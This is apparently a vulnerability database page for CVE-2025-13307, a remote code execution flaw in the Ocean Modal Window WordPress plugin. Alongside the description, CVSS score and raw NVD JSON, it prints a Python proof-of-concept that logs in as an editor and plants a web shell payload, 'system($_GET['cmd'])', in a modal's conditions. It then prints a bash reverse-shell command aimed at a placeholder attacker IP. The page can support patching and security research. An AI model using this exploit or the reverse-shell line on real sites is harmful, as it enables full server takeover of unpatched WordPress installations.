CVE-2025-13307

Description

The Ocean Modal Window WordPress plugin before 2.3.3 is vulnerable to Remote Code Execution via the modal display logic. These modals can be displayed under user-controlled conditions that Editors and Administrators can set (edit_pages capability). The conditions are then executed as part of an eval statement executed on every site page. This leads to remote code execution.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ocean Modal Window WordPress Plugin < 2.3.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-13307 PoC - Ocean Modal Window RCE
# Requires WordPress Editor/Admin privileges

import requests
import re

target_url = "http://target-wordpress-site.com"
wp_admin_url = f"{target_url}/wp-admin/admin.php?page=ocean-modal-window"

# Authentication (Editor or Admin account)
session = requests.Session()
login_data = {
    'log': 'attacker_username',
    'pwd': 'attacker_password',
    'wp-submit': 'Log In',
    'redirect_to': wp_admin_url
}

# Login to WordPress
session.post(f"{target_url}/wp-login.php", data=login_data)

# Create malicious modal with RCE payload
# The payload executes system commands via eval()
rce_payload = "system($_GET['cmd']);"

modal_data = {
    'modal_title': 'Malicious Modal',
    'modal_conditions': rce_payload,  # Injected into eval()
    'modal_action': 'save'
}

# Save the malicious modal
response = session.post(wp_admin_url, data=modal_data)

# Trigger RCE by accessing any page with cmd parameter
if 'success' in response.text or response.status_code == 200:
    print("[+] Malicious modal created successfully")
    print("[+] Trigger RCE via: " + target_url + "/?cmd=whoami")
else:
    print("[-] Failed to create modal")

# Alternative: Direct command execution after modal creation
print(f"[*] Execute commands: {target_url}/?cmd=id")
print(f"[*] Reverse shell: {target_url}/?cmd=bash -i >& /dev/tcp/attacker-ip/4444 0>&1")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13307
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13307
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13307/
[4] VulDB https://vuldb.com/cve/CVE-2025-13307
[5] https://wpscan.com/vulnerability/710de342-6fb9-47bd-a40b-7b74fc3c181b/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13307", "sourceIdentifier": "[email protected]", "published": "2025-12-19T06:15:50.837", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Ocean Modal Window WordPress plugin before 2.3.3 is vulnerable to Remote Code Execution via the modal display logic. These modals can be displayed under user-controlled conditions that Editors and Administrators can set (edit_pages capability). The conditions are then executed as part of an eval statement executed on every site page. This leads to remote code execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://wpscan.com/vulnerability/710de342-6fb9-47bd-a40b-7b74fc3c181b/", "source": "[email protected]"}]}}